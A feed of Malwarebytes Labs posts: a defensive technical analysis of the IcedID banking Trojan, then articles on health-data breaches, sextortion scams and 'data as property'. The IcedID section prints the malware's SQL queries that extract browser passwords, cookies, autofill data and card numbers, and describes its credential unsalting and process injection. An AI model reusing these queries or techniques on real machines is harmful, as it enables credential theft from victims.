In the current delivery model, the first element of IcedID is a downloader. It is a PE file, packed by a crypter. The packing layer changes from sample to sample, so we will omit its description. After unpacking it, we get the plain version: fbacdb66748e6ccb971a0a9611b065ac.

Internally, this executable is simple and no further obfuscated. We can see that it first queries the CnC trying to fetch the second stage, requesting for a photo.png. It passes a generated ID to the URL. Example:

/photo.png?id=0198d464fe3e7f09ab0005000000fa00000000

Fragment of the function responsible for generating the image URL

The downloader fetches the PNG with the encoded payload. The downloader loads the file, decodes it, and redirects the execution there. Below we can see the responsible function:

Once the PNG is downloaded, it will be saved on disk and can be loaded again at system restart. The downloader will turn into a runner of this obfuscated format. In this way, the core executable is revealed only in memory and never stored on disk as an EXE file.

The “photo.png” looks like a valid graphic file:

Preview of the “photo.png”

In this fragment of code, we can see that the data from the PNG (section starting from the tag “IDAT”) is first decoded to raw bytes, and then those bytes are passed to the further decoding function.

The algorithm used for decoding the bytes:

The PNG is decrypted and injected into the downloader. In this case, the decoded content turns out to be a shellcode module rather than a PE.

The downloader redirecting the execution into the shellcode’s entry point

The loader passes to the shellcode one argument; that is the base at which it was loaded.

The loader (shellcode)

As mentioned before, this stage is implemented as a position-independent code (shellcode). The dumped sample is available here: 624afab07528375d8146653857fbf90d.

This shellcode-based loader replaced the previously described (sources: [1][2]) loader element that was implemented as a PE file. First, it runs within the downloader:

As we can see from the downloader’s code, the shellcode entry point must first be fetched from a simple header that is at the beginning of the decoded module. We see that this header stores more information that is essential for loading the next element:

As this module is no longer a PE file, its analysis is more difficult. All the APIs used by the shellcode are resolved dynamically:

The strings are composed on the stack:

To make the deobfuscation easier, we can follow the obfuscated flow with the help of a PIN tracer. The log from the tracing of this stage shows APIs indicating code injection, along with their offsets:

09c;shellcode's Entry Point
69b;ntdll.LdrLoadDll
717;ntdll.LdrGetProcedureAddress
7ab;ntdll.RtlWow64EnableFsRedirectionEx
7cb;kernel32.CreateProcessA
7d6;ntdll.RtlWow64EnableFsRedirectionEx
7f0;ntdll.NtQuerySystemInformation
8aa;ntdll.NtAllocateVirtualMemory
8c6;ntdll.ZwWriteVirtualMemory
8ee;ntdll.NtProtectVirtualMemory
907;ntdll.NtQueueApcThread
916;ntdll.ZwResumeThread

Indeed, the shellcode injects its own copy, passing its entry point to the APC Queue. This time, some additional parameters are added as a thread context.

Setting parameters of the injected thread

Once the shellcode is executed from inside svchost, an alternative path to the execution is taken. It becomes a loader for the core bot. The core element is stored in a compressed form within the shellcode’s body. First, it is decompressed.

From previous experiments, we know that the payload follows the typical structure of a PE file, yet it has no headers. Often, malware authors erase headers in memory once the payload is loaded. Yet, this is not the case. In order to make the payload stealthier, the authors didn’t store the original headers of this PE at all. Instead, they created their own minimalist header that is used by the internal loader.

First, the shellcode finds the next module by parsing its own header:

The shellcode also loads the imports of the payload:

Below, we can see the fragment of code responsible for following the custom headers definition, and applying protection on pages. After the next element is loaded, execution is redirected to its entry point.

The entry point of the next module where the function expects the pointer to the data to be supplied:

The supplied data is appended at the end of the shellcode, and contains: the path of the initial executable, the path of the downloaded payload (photo.png), and other data.

Reconstructing the PE

In order to make analysis easier, it is always beneficial to reconstruct the valid PE header. There are two approaches to this problem:

  1. Manually finding and filling all the PE artifacts, such as: sections, imports, relocations (this becomes a problem in if all those elements are customized by the authors, as in the case of Ocean Lotus sample)
  2. Analyzing in detail the loader and reconstructing the PE from the custom header

Since we have access to the loader’s code, we can go for the second, more reliable approach: Observe how the loader processes the data and reconstruct the meaning of the fields.

A fragment of the loader’s code where the sections are processed:

The custom header reconstructed based on the analysis:

Fortunately, in this case the malware authors customized only the PE header. The Data Directory elements (imports and relocations) are kept in a standard form, so this part does not need to be converted.

The converter from this format to PE is available here:

https://github.com/hasherezade/funky_malware_formats/tree/master/iced_id_parser

Interestingly, the old version of IcedID used a similar custom format, but with one modification. In the past, there was one more DWORD-sized field before the ImportDirector VA. So, the latest header is shorter by one DWORD than the previous one.

The module in the old format: bbd6b94deabb9ac4775befc3dc6b516656615c9295e71b39610cb83c4b005354

The core bot (headerless PE)

6aeb27d50512dbad7e529ffedb0ac153 – a reconstructed PE

Looking inside the strings of this module, we can guess that this element is responsible for all the core malicious operations performed by this malware. It communicates with the CnC server, reads the sqlite databases in order to steal cookies, installs its own certificate for Man-In-The-Browser attacks, and eventually downloads other modules.

We can see that this is the element that was responsible for generating the observed requests to the CnC:

During the run, the malware is under constant supervision from the CnC. The communication with the server is encrypted.

String obfuscation

The majority of the strings used by the malware are obfuscated and decoded before use. The algorithm used for decoding is simple:

In order to decode the strings statically, we can reimplement the algorithm and supply to it encoded buffers. Another easier solution is a decoder that loads the original malware and uses its function, as well as the encoded buffers given by offset. Example available here.

Decoding strings is important for the further analysis. Especially because, in this case, we can find some debug strings left by the developers, informing us about the actions performed by the malware in particular fragments of code.

A list of some of the decoded strings is available here.

Available actions

The overview of the main function of the bot is given below:

The bot starts by opening a socket. Then, it beacons to the CnC and initializes threads for some specific actions: MiTM proxy, browser hooking engine, and a backconnect module (backdoor).

It also calls to a function that initializes handlers, responsible for managing a variety of available actions. The full list:

By analyzing closer to the handlers, we notice that similar to the first element, the main bot retrieves various elements as steganographically protected modules. The function responsible for decoding PNG files is analogical to the one found in the initial downloader:

Those PNGs are used to carry the content of various updates for the malware. For example, an update to the list of URLs, but also other configuration files.

Execution flow controlled by the CnC

The malware’s backconnect feature allows the attacker to deploy various commands on the victim machine. The CnC can also instruct the bot to decode other malicious modules from inside that will be deployed in a new process. For example:

If the particular command from the CnC is received, the bot will decompress another buffer that is stored inside the sample and inject it into a new instance of svchost.

The way in which this injection is implemented reminds us of the older version of the loader. First, the buffer is decompressed with the help of RtlDecompressBuffer:

Then, memory is allocated at the preferred address 0x3000.

Some functions from NTDLL and other parameters will be copied to the structure, stored at the beginning of the shellcode.

We can see there are some functions that will be used by the shellcode to load another embedded PE.

Similar to in the old loader, the redirection to the new entry point is implemented via hook set on the RtlExitUserProcess function:

After the buffer gets decompressed, we can see another piece of shellcode:

This shellcode is an analogical loader of the headerless PE module. We can see inside the custom version of PE header that will be used by the loader:

The custom header, containing minimal info from the PE header

Dumped shellcode: 469ef3aedd47dc820d9d64a253652d7436abe6a5afb64c3722afb1ac83c3a3e1

This element is an additional backdoor, deploying on demand a hidden VNC. It is also referenced by the authors by the name “HDESK bot” (Help Desk bot) because it gives the attacker direct access to the victim machine, as if it were a help-desk service. Converted to PE: 2959091ac9e2a544407a2ecc60ba941b

The “HDESK bot” deploys a hidden VNC to control the victim machine

Below, we will analyze the selected features implemented by the core bot. Note that many of the features are deployed on demand—depending on the command given by the CnC. In the observed case, the bot was also used as a downloader of the secondary malware, TrickBot.

Installing its own certificate

The malware installs its own certificate. First it drops the generated file into the %TEMP% folder. Then, the file is loaded and added to the Windows certificate store.

Fragment of Certificate generation function:

Calling the function to add the certificate to store:

Stealing passwords from IE

We can see that this bot goes after various saved credentials. Among the different methods used, we identified stealing data from the Credential Store. The used method is similar to the one described here.

We can see that it uses the mentioned GUID “abe2869f-9b47-4cd9-a358-c22904dba7f7” that was used to salt the credentials. After reading the credentials from the store, the bot undoes the salting operation in order to get the plaintext.

Stealing saved email credentials

The bot is trying to use every opportunity to extract passwords from the victim machine, also going after saved email credentials.

Stealing cookies

As we observed during the behavioral analysis, the malware drops the sqlite3.dll in the temp folder. This module is further loaded and used to perform queries to browsers’ databases with saved cookies.

Fragment of code responsible for loading sqlite module

The malware searches the files containing cookies of particular browsers:

We can see the content of the queries after decoding strings:

SELECT host, path, isSecure, expiry, name, value FROM moz_cookies

It targets Firefox, as well as Chrome and Chromium-based browsers:

The list of targeted Chromium browsers

Fragment of the code performing queries:

The list of queries to the Chrome’s database:

SELECT name, value FROM autofill

SELECT guid, company_name, street_address, city, state, zipcode, country_code FROM autofill_profiles

SELECT guid, number FROM autofill_profile_phones

SELECT guid, first_name, middle_name, last_name, full_name FROM autofill_profile_names

SELECT card_number_encrypted, length(card_number_encrypted), name_on_card, expiration_month || "/" ||expiration_year FROM credit_cards

SELECT origin_url,username_value,length(password_value),password_value FROM logins WHERE username_value <> ''

SELECT host_key, path, is_secure, (case expires_utc when 0 then 0 else (expires_utc / 1000000) - 11644473600 end), name, length(encrypted_value), encrypted_value FROM cookies

The list of queries to the Firefox’s database:

SELECT host, path, isSecure, expiry, name, value FROM moz_cookies

SELECT fieldname, value FROM moz_formhistory

All the found files are packed into a TAR archive and sent to the CnC.

Similarly, it creates a “passff.tar” archive with stolen Firefox profiles:

Hooking browsers

As mentioned earlier, the malware attacks and hooks browsers. Since the analogical functionality is achieved by different functions within different browsers, a set of installed hooks may be unique for each.

First, the malware searches for targets among the running processes. It uses the following algorithm:

It is similar to the one from the previous version (described here), yet we can see a few changes, i.e. the checksums are modified, and some additional checks are added. Yet, the list of the attacked browsers is the same, including the most popular ones: Firefox, MS Edge, Internet Explorer, and Chrome.

The browsers are first infected with the dedicated IcedID module. Just like all the modules in this edition of IcedID, the browser implant is a headerless PE file. Its reconstructed version is available here: 9e0c27746c11866c61dec17f1edfd2693245cd257dc0de2478c956b594bb2eb3.

After being injected, this module finds the appropriate DLLs in the memory of the process and sets redirections to its own code:

Parsing the instructions and installing the hooks:

Then, the selected API functions are intercepted and redirected to the plugin. Usually the hooks are installed at the beginning of functions, but there are exceptions to this rule. For example, in case of Internet Explorer, a function within the mswsock.dll has been intercepted in between:

Looking at the elements in memory involved in intercepting the calls: the browser implant (headerless PE), and the additional memory page:

Example of the hook in Firefox:

Step 1: the function SSL_AuthCertificateHook has a jump redirecting to the implanted module:

Step 2: The implanted module calls the code from the additional page with appropriate parameters:

Step 3: The code at the additional page is a patched fragment of the original function. After executing the modified code, it goes back to the original DLL.

The functionality of this hook didn’t change from the previous version.

Webinjects

The bot gets the configuration from the CnC in the form of .DAT files that were mentioned before. First, the file is decoded by RC4 algorithm. The output must start from the “zeus” keyword, and is further encoded by a custom algorithm. Scripts dedicated for each site are identified by a script ID.

After the files are loaded and decoded, we can see the content:

There are multiple types of webinjects available to perform by the bot:

Depending on the configuration, the bot may replace some parts of the website’s code, or add some new, malicious scripts.

Executing remote commands

In case the commands implemented by the bot are not enough for the needs of the operator, the bot allows a feature of executing commands from the command line.

The output of the run commands is sent back to the malware via named pipe, and then supplied back to the CnC.

Mature banker and stealer

As we can see from the above analysis, IcedID is not only a banking Trojan, but a general-purpose stealer able to extract a variety of credentials. It can also work as a downloader for other modules, including covert ones, that look like harmless PNG files.

This bot is mature, written by experienced developers. It deploys various typical techniques, including Zeus-style webinjects, hooks for various browsers, hidden VNC, and backconnect. Its authors also used several known obfuscation techniques. In addition, the use of customized PE headers is an interesting bonus, slowing down static analysis.

In recent updates, the malware authors equipped the bot with steganography. It is not a novelty to see it in the threat landscape, but it is a feature that makes this malware a bit more stealthy.

Indicators of Compromise

Sandbox runs:

https://app.any.run/tasks/8595602a-fa98-4cfa-80d7-98925091dc48/
https://app.any.run/tasks/a7abba78-cf6d-4c68-b94c-4835d5becb13/

MITRE
  • Execution:
    • Command-Line Interface
    • Execution through Module Load
    • Scheduled Task
    • Scripting
    • Windows Managment Intstrumentation
  • Persistence:
    • Registry Run Keys/ Startup Folder
    • Scheduled Task
  • Privilege Escalation
    • Scheduled Task
  • Defense Evasion
    • Scripting
  • Credential Access
    • Credentials in Files
    • Credential Dumping
  • Discovery
    • Network Share Discovery
    • Query Registry
    • Remote System Discovery
    • System Information Discovery
    • System Network Configuration Discovery
  • Lateral Movement
    • Remote File Copy

Source: https://app.any.run/tasks/48414a33-3d66-4a46-afe5-c2003bb55ccf/

References

About the old variants of IceID:

The post New version of IcedID Trojan uses steganographic payloads appeared first on Malwarebytes Labs.

Categories: Malware Bytes

A week in security (November 25 – December 1)

Malware Bytes Security - Mon, 12/02/2019 - 11:23am

Last week on Malwarebytes Labs, we discussed why the notion of “data as property” may potentially hurt more than help, homed in on sextortion scammers getting more creative, and explored the possible security risks Americans might face if the US changed to universal healthcare coverage.

Other cybersecurity news

Stay safe, everyone!

The post A week in security (November 25 – December 1) appeared first on Malwarebytes Labs.

Categories: Malware Bytes

Would ‘Medicare for All’ help secure health data?

Malware Bytes Security - Tue, 11/26/2019 - 3:30pm

DISCLAIMER: This post is not partisan, but rather focuses on risk assessment based on history and what threats we are facing in the future. We do not endorse any healthcare plan style in any way, outside of examining its data security risk.

For many folks, the term ‘Healthcare for All’ brings up an array of emotions ranging from concern to happiness, and with the changes that come with this policy, we’re not surprised. However, beyond the usual arguments on this subject, we wanted to ask the question: Are there any security risks we need to be worried about if the United States were to switch to ‘Healthcare for All’ policies?

To clarify, there are many healthcare for all style plans currently on paper, being fine-tuned in Washington and in the minds of politicians.  So, for the purposes of this article, we’re referring to ‘Healthcare for All’ plans that are meant to replace, not supplement, private insurance plans in addition to legislation that prohibits private insurance companies from collecting and/or storing patient data. 

‘Healthcare for All’ data security

To start, we’re going to examine the government’s track record of securing patient data.  Since we aren’t living in a world where ‘Healthcare for All’ exists in our country, we’ll use data security practices concerning Heatlhcare.gov and the department that runs it, the Centers for Medicare and Medicaid Services (CMS) to get a sense of how well patient data might be secured by government departments.

The Healthcare.gov website had a bumpy start back in October of 2013. Numerous issues resulted only a small percentage of patients being able to sign up with the website in the first week.

In an article posted by the Associated Press, as well as independent investigations by the Electric Frontier Foundation (EFF), it was discovered that healthcare.gov was sending personal data to third parties by putting personal information in data request headers.

Request header sent to third party advertisers, including personal information. Thanks to EFF.org

Later, In September 2015, the Department of Health and Human services (HHS) inspector general completed a federal audit of CMS and the Healthcare.gov website.  Their primary concerns were not about patient information being compromised, but rather the breach of a database called MIDAS that stored a lot of personally identifiable information about users of Healthcare.gov.  Namely that this database had numerous high severity vulnerabilities that needed to be patched and that overall, health officials didn’t utilize best practices across the entire system.

Finally, in 2018, the U.S. Government Accountability Office conducted a survey of the Centers for Medicare and Medicaid Services to assess its ability to protect Medicare data from external entities.

According to HippaJournal.Com:

“The study had three main objectives: To determine the major external entities that collect, store, and share Medicare beneficiary data, to determine whether the requirements for protection of Medicare data align with federal guidance, and to assess CMS oversight of the implementation of those requirements.”

Turns out that while there are some requirements in place to ensure that certain entities are cleared for access to this data, there are some who are not and therefore could abuse the data they gain access to!  There are three main groups that access Medicare beneficiary data, either Medicare Administrative Contractors (MACs), who process Medicare claims, research organizations, and entities that use claims data to assess the performance of Medicare service providers.

Unfortunately, only the processes for clearing access to this data for MACs and service provider entities are in line with federal guidance, which is designed to be used for all CMS contractors.  Researchers, on the other hand, aren’t considered CMS contractors.  Basically, the oversight required by federal regulation on access to this data was previously applied to only 2/3rds of all users who could access that data, so there is no guarantee that the data was fully protected.

While we listed out numerous instances of government controlled patient data being put into compromising positions, reports of lost medical data from government-controlled systems are actually very small. I couldn’t find anything that blamed the CMS or HHS for a data breach.

Private Insurance data security

The luck of not having much, if any, medical data breached despite numerous occasions of unpatched vulnerabilities being identified for healthcare.gov and it’s controlling department doesn’t quite extend to the private insurance world.

In July 2019, Premera Blue Cross, an insurance company for the Pacific Northwest of the U.S, agreed to pay a settlement of over $10 million to numerous state offices. Premera suffered a massive data breach that exposed the data of more than 10 million patients in 2015. The press release from the Washington State Office of the Attorney General claims:

“From May 5, 2014 until March 6, 2015, a hacker had unauthorized access to the Premera network containing sensitive personal information, including private health information, Social Security numbers, bank account information, names, addresses, phone numbers, dates of birth, member identification numbers and email addresses.”

In addition to that, there were complaints that Premera mislead consumers about the breach and the full scope of potential damage that could be done.

In October of 2018, an employee with Blue Cross Blue Shield of Michigan lost a laptop that had customer’s personal medical data saved on it.  The company jumped into action and worked with a subsidiary to change the access credentials to the encrypted laptop and to their knowledge, there is no evidence that the patient data was compromised, however, according to CISOMag:

“The access information includes the member’s first name, last name, address, date of birth, enrollee identification number, gender, medication, diagnosis, and provider information. Blue Cross clarified that the Social Security numbers and financial account information were not included in the accessible data.”

Finally, in 2019, Dominion National insurance identified than an unauthorized party may have been able to access internal severs, as early as August 2010! According to a press release:

“Dominion National has undertaken a comprehensive review of the data stored or potentially accessible from those computer servers and has determined that the data may include enrollment and demographic information for current and former members of Dominion National and Avalon vision, as well as individuals affiliated with the organizations Dominion National administers dental and vision benefits for. The servers may have also contained personal information pertaining to plan producers and participating healthcare providers. The information varied by individual, but may include names in combination with addresses, email addresses, dates of birth, Social Security numbers, taxpayer identification numbers, bank account and routing numbers, member ID numbers, group numbers, and subscriber numbers.“

These were three examples of breaches that occurred to actual health insurance companies, not third parties or government-controlled healthcare organizations.  In two of these instances, the attacker maintained a foothold on the network for over a year (9 years in Dominion’s case!) and in another instance, someone just lost a laptop full of patient data (the same thing happened to the Department of Homeland Security & The Department of Health & Human Services over the last few years. We need to just tape our laptops to our bodies like a tourist with a passport!)

Why neither of these is the problem

Okay, so which is it? Is it more secure to entrust our government with control of patient data, or are we in better hands with private insurance companies?  The reality is, neither one matters because neither is the actual problem.

It’s not the organizations that we depend on to protect our data that are being breached as much as the third-party organizations they work with.  From mailing services to labs to billing organizations, most of our patient data breaches are happening to organizations who don’t have any real need to hold on to our data, which may be why they fail to secure it. 

Third party breaches

In September of this year, Detroit-based medical contractor, Wolverine Solutions Group (WSG), was breached, resulting in the possible compromise of hundreds of thousands of patients nationwide. WSG provided mailing, as well as other, services to hospitals and healthcare companies. They were hit by a Ransomware attack which resulted in data that belonged to numerous healthcare organizations patients being ransomed. 

While the investigation into the attack hasn’t resulted in any evidence that data has been stolen, in a quote of WSG President Darryl English in the Detroit Free Press:

“Nevertheless, given the nature of the affected files, some of which contained individual patient information (names, addresses, dates of birth, Social Security numbers, insurance contract information and numbers, phone numbers, and medical information, including some highly sensitive medical information), out of an abundance of caution, we mailed letters to all impacted individuals recommending that they take immediate steps to protect themselves from any potential misuse of their information,”

Despite their belief that no patient data was obtained, the same article by the Detroit Free Press describes the case of Tyler Mayes of Oxford, who has identified numerous fraudulent medical charges on his credit report:

“I haven’t been put under the knife in four years,” he said. “So I had a phantom surgery that not even I knew about? I have received no bills in the mail, and have received no phone calls. I have no emails. They just randomly appeared on my credit report. “I think they’re not letting out as much out of the bag as they’ve got in there,” Mayes said of the Wolverine Solutions Group breach.

In May, Spectrum Health Lakeland started sending out letters to about a thousand of their patients, because their billing services company (OS, Inc) was breached, resulting in the possible theft of patient names, addresses and health insurance providers, but not social security and driver’s license numbers (the bad guys will have to find that somewhere else I guess.)

According to an article for MLive Michigan that covers the breach:

“Billing services company OS, Inc. confirmed Wednesday , May 8, an unauthorized individual accessed an employee’s email account that held information related to some Spectrum Health Lakeland patients, according to a Spectrum Health news release.”

A successful phishing attack against the employees of Solara Medical Supplies, reported in mid-November, lead to a breach that lasted almost a year and resulted in the loss of employee names and potentially addresses, dates of birth, health insurance information, social security numbers, financial and identification information, passwords, PINs and all kinds of other juicy data.

However, a big concern about the breach of employee e-mail accounts for a third-party vendor is the possibility for attackers to use those infected systems as staging areas to launch additional malicious phishing attacks using e-mail addresses from employees of Solara.

Finally, an ongoing investigation by the Securities and Exchange Commission that started May 2019 identified that American Medical Collection Agency (AMCA) was breached for eight months between Aug 2018 and March 2019.

Actual numbers of affected patients are still being worked out, however according to Health IT Security, at least six covered entities have reported that their patient data was compromised by the attack. This includes patient information from 12 million folks who have utilized Quest Diagnostics and 7.7 million Labcorp patients.

“And just this week a sixth provider, Austin Pathology Associates, reported at least 46,500 of its patients were impacted by the event. Shortly after, seven more covered entities reported they too were impacted: Natera, American Esoteric Laboratories, CBLPath, South Texas Dermatopathology, Seacoast Pathology, Arizona Dermatopathology, and Laboratory of Dermatopathology ADX.”

When known affected patients’ tallies are added together, approximately 25 million patients have had their data compromised thanks to this attack. There are still providers who are figuring out the full extent so you can rest assured that the number is likely going to rise.

So, coming back to our original question, it looks like our biggest problem with keeping control of medical data is that it’s spread out all over the place! A ‘Medicare for All’ plan may reduce breaches to some extent because you’ll remove a few companies that could possess the data, however, just based on our own research in this article, often we see greater success by cybercriminals breaching third-party medical vendors than going after government or established insurance companies.

What is being done?

If this is your first-time hearing about the potential dangers of third-party data sharing, don’t fret, because politicians are on it!  A first step in taking action to curb data theft is to establish a department specifically for digital privacy—an idea introduced this month by Rep Anna G. Eshoo [D-CA-18].  The Online Privacy Act of 2019 was introduced to the U.S. House of Representatives in early November.

The purpose of the bill is:

”To provide for individual rights relating to privacy of personal information, to establish privacy and security requirements for covered entities relating to personal information, and to establish an agency to be known as the United States Digital Privacy Agency to enforce such rights and requirements, and for other purposes.”

Online Privacy Act of 2019

There are some politicians who are against this bill and want to continue to have the Federal Trade Commission be the department concerned with digital privacy, however we can see how well that is going.

Beyond just a new department for privacy, Senator Mark R. Warner [D-VA] has called out new legislation on patient data sharing to put in more language about the importance of establishing controls and security in the development of technologies that allow patients greater insight into their Electronic Health Record (EHR).

The proposed legislation from the Department of Health and Human Services (HHS) requires insurers participating in CMS-run programs, like Medicare, to allow patients to access their health information electronically. They plan to do this by establishing an Application Programming Interface (API) that third-party vendors can utilize to obtain data and make it viewable to the patient.

Sen. Warner, who has been a huge advocate for privacy and security, wrote a letter to the legislation authors, asking for a serious focus on the security of that API so it’s not abused. In the letter he states:

“…I urge CMS to take additional steps to address the potential for misuse of these features in developing the rules around APIs. In just the last three years, technology providers and policymakers have been unable to anticipate – or preemptively address – the misuse of consumer technology which has had a profound impact across our society and economy. As I have stated repeatedly, third-party data stewardship is a critical component of information security…”

Senator Mark R. Warner [D-VA]

We don’t know what help these efforts will provide in the long run, but we are in a good position to start really discussing the dangers and solutions to problems concerning digital healthcare data, specifically it’s uses and abuse.

The wrap-up

Now that we’ve covered all that, did we answer our question? Does ‘Medicare for All’ have any impact on data security? It looks like the answer is no, regardless of the health plan we use, the data is going to continue to be vulnerable, in large part because of third-party sharing.

Neither the government nor private health insurance have a perfect score when it comes to data security, however both have been affected by third-party breaches.  In the case of private insurance companies, breaches like that at OS, Inc. circumvented all efforts made by Blue Cross and other insurance companies to protect their patient data. At the same time, government health care technology has been riddled with misconfigurations and poor practices that frankly make it a miracle that data hasn’t already been completely harvested by cyber criminals.

The good news is that every attack brings the knowledge of how to avoid one in the future. Our health data is more secure now than any other point of digital healthcare record history, and it’s only going to get better! With the backing of government legislation on the protection of not just medical data, but how it’s transferred and stored, we can turn this whole thing around.

Unfortunately for the millions of patients who have had their personal data stolen and likely stored away in the databases of numerous criminals, and those who are likely going to have to deal with fraud and theft by criminals because of it for the foreseeable future, we are the broken eggs in this security omelet. Let’s hope the next group fare better.

The post Would ‘Medicare for All’ help secure health data? appeared first on Malwarebytes Labs.

Categories: Malware Bytes

Sextortion scammers getting creative

Malware Bytes Security - Tue, 11/26/2019 - 12:09pm

We’ve covered sextortion before, focusing in on how the core of the threat is an exercise in trust. The threat actor behind the campaign will use whatever information available on the target that causes them to trust that the threat actor does indeed have incriminating information on them. (They don’t.) But as public awareness of the scam grows, threat actors have to pivot to less expected pitches to maintain the same response from victims. Let’s take a look at a recent variant.

As we can see, the technique at hand appears to be peppering the pitch with as many technical terms as possible in order to wear down a victim’s defenses and sell the lie that the threat actor actually hacked them. (NOTE: employing a blizzard of technical vocabulary as quickly as possible is a common technique to sell lies offline, as well as via email.) If we take a closer look, the facade begins to fall away fairly quickly.

  • EternalBlue, RATs, and trojans are all different things
  • Porn sites either don’t allow anonymous user uploads, or scan and monitor those uploads for malicious content
  • The social media data referenced is not stored locally and thus cannot be ‘harvested’ and is largely available on the open web anyway
  • a RAT cannot take a specific action based on what you’re doing in front of an activated camera. How would it know?

Some of these points would be difficult for an average user to realize, but the last two serve as pretty good red flags that the actor in the email is not as sophisticated as he claims. The problem is that by starting the pitch with the most alarming possible outcome, many users are pushed into a panic and don’t stop to consider small details. A key to good defense against sextortion is taking a deep breath, reading the email carefully, and asking yourself – do these claims make sense?

Where did it come from?

Sextortion scammers typically take a shotgun approach to targeting, using compromised or disposable email addresses to send out as many messages as possible. Some variants will attempt to make the pitch more effective by including actual user passwords gleaned from old database breaches. The important thing to remember though, is that the scammers do not have any current information to disclose, because they didn’t actually hack anyone. This is a fairly low effort social engineering attack that remains profitable precisely because the attacker does not have to expend resources actually hacking an end user.

How NOT to get help

The bulk of cyber threats out there are in fact symptoms of human systems failures. Appropriate, responsible infosec responses to these failures give people tools to shore up those systems, thereby ensuring the cyber threat does not claim a foothold to begin with. Less prudent infosec responses, however, do this:

An IP address is the rough online equivalent to a zip code. Could you find where someone whose name you don’t know lives based solely on a zip code? Would you really trust a company who makes grammatical errors in their own Google ads?

Is there anyone in 2019 who genuinely believes it’s possible to keep anything off the Internet? Extraordinary claims require extraordinary evidence, but unfortunately they don’t provide any as their technology is “proprietary.”

It can be very frightening for a user to receive one of these social engineering attempts, particularly if the pitch is loaded with a slew of technical terms they do not understand. But close reading of the email can sometimes reveal red flags indicating the threat actor is not exactly the sharpest hacker out there. Further, the defense against sextortion is one of the cheapest, easiest defenses against cyber threats out there: do nothing. Stay vigilant, and stay safe.

The post Sextortion scammers getting creative appeared first on Malwarebytes Labs.

Categories: Malware Bytes

“Data as property” promises fix for privacy problems, but could deepen inequality

Malware Bytes Security - Mon, 11/25/2019 - 11:00am

In mid-November, Democratic presidential hopeful Andrew Yang unveiled a four-prong policy approach to solving some of today’s thornier tech issues, such as widespread misinformation, technology dependence, and data privacy. Americans, Yang proposed, should receive certain, guaranteed protections for how their data is collected, shared, and sold—and if they choose to waive those rights, they should be compensated for it.

This is, as Yang calls it, “data as a property right.” It is the idea that, since technology companies are making billions of dollars off of what the American public feeds them—data in the forms of “likes,” webpage visits, purchase records, location history, friend connections, etc.—the American public should get a cut of that money, too.

Data property supporters in the US argue that, through data payments, Americans could rebalance the relationship they have with the technology industry, giving them more control over their data privacy and putting some extra money in their pockets, should they want it.

But data privacy advocates argue that, if what Americans need are better data privacy rights, then they should get those in an actual data privacy bill. Further, the data property model could harm more people than it helps, disproportionately robbing low-income communities of their data privacy, while also normalizing the idea that privacy is a mere commodity—it’s only worth the sale price we give it.

To some, a data property model would only keep large corporations in control. No sudden wellspring of rights. No rebalance of power.  

Ulises Mejias, associate professor at State University of New York, Oswego, described the data property model in a broader historical context.

“Paying someone for their work is not a magical recipe for eliminating inequality, as two centuries of capitalism have demonstrated,” Mejias said. He said that, like plantation owners and factory owners, modern data-mining companies understand that, to maintain their profit streams, they have to allow some leniency towards those who they profit from—the people.

“So, we will probably start to see more proposals to ‘fix’ the system by paying us for our data, even from ‘progressive’ figures like Yang or [Jaron] Lanier,” Mejias said. “This, however, does not amount to the dismantling of data colonialism. Rather, it is an attempt to make it the new normal.”

He continued: “The surveillance mechanisms would not go away; they would just be paying us to put up with them.”

Data as property

In 2013, the computer scientist Jaron Lanier, who Mejias referenced, published the book Who Owns the World, a forward-looking, philosophical analysis about our relationship with data and the Internet. In the book, Lanier proposed a then-novel idea: People should be paid royalties for the data they create that goes on to benefit other people.

Six years later, Lanier has refined his ideas into the banner of “data dignity.” As he loftily told the New York Times in a video segment, a recording of “Für Elise” buoying his words:

“You should have the moral rights to every bit of data that exists because you exist, now and forever.”

For data property or dignity supporters, owning your data is a first step toward meaningful, tectonic changes: individualized data privacy controls, higher economic returns, and balanced relationships with technology corporations.

Here’s what that society would allow, supporters say.

One, if consumers own their data, they can make decisions about how companies treat it, including how their data is collected and then shared and sold to separate, third parties. By having the option to say “no” to data sharing and selling, consumers could, in effect, say “no” to some of the most common data privacy oversteps today. No more menstrual tracking information shared with Facebook. No more GPS location data aggregated publicly online. Maybe even no more Cambridge Analytica.

Two, the option to sell data could potentially benefit countless Americans with a near-endless revenue stream. Christopher Tonetti, associate professor of economics at Stanford University’s Graduate School of Business, argued in the Wall Street Journal that data is unlike most any other commodity because its value continues after the first point of sale.

“With most goods—think of a plate of sushi or an hour of your doctor’s time—one person’s consumption of the good means there is less to go around. But data is infinitely usable,” Tonetti said. “That means that if consumers could sell their data, they would have the ability to share the data from any transaction with multiple organizations—to their own benefit and that of society as a whole.”

This potential passive, money-making venture gains even more appeal when major political players—like Yang—argue that “our data is now worth more than oil.”

But there’s missing information in that statement, say data privacy advocates. Our data is worth more than oil to who?

Data as property flaws

Curiously absent from the discussions about data property rights are detailed analyses about the actual value of consumer data. Sure, the numbers may show that the data-driven advertising industry has eclipsed the dollar-size of the oil industry, but there is no data analogue for what an oil barrel costs. There’s no going rate for Facebook likes, no agreed-upon exchange rate for Instagram popularity.

Hayley Tsukuyama, legislative analyst at Electronic Frontier Foundation, said that using available numbers does not provide reliable statistics when trying to determine data’s “value.”

“When you look at a sell list of location data, and do some back-of-the-envelope math, where a company paid this much for it, and there’s 50 people on the list, and therefore, their data is worth this—that’s not how it works,” Tsukayama said. She said we similarly cannot track the value of the average Facebook user’s data based on a simplistic equation of dividing the company’s ad revenue by its user base.

Tsukayama also pointed to a bigger problem with the data as property model: Consumers will not be selling their data, so much as they’ll be selling their privacy. And for some types of data, the invasion of privacy will always cost too much, she said.

“My location data may cost a penny to buy, but to me that’s worth no amount of money—there’s no amount of money you could pay me to make me okay with someone knowing my location,” she said.

Chad Marlow, senior advocacy and policy counsel at ACLU, added another problem about data valuation: It’s subjective. A company that sells Legos, he said, would pay more for children’s data, much in the same way that a company that sells cars would pay more for adults’ data.

Taking the example to what he called an extreme, Marlow said:

“My tax returns? Probably not worth so much. Trump’s tax returns? Probably worth a big deal!”

In all these situations—whether its vague data valuation, contextual pricing, or putting a literal price tag on privacy—both Tsukayama and Marlow agreed that some consumers will be harmed more than others.

Much like the pay-for-privacy schemes that have bubbled up in the past year, data property models would enable companies to take advantage of low-income communities that need the extra money. It’s much easier for a middle-class earner to say no to a privacy invasion than it is for stressed, hungry families, Marlow said.

“If you have parents who are struggling to put food on the table—who are eating bread and drinking water for multiple dinners—and you say ‘I will give you money if you sell your data’ and you don’t even say how much, they will say yes immediately,” Marlow said. “Because they cannot afford to say no.”

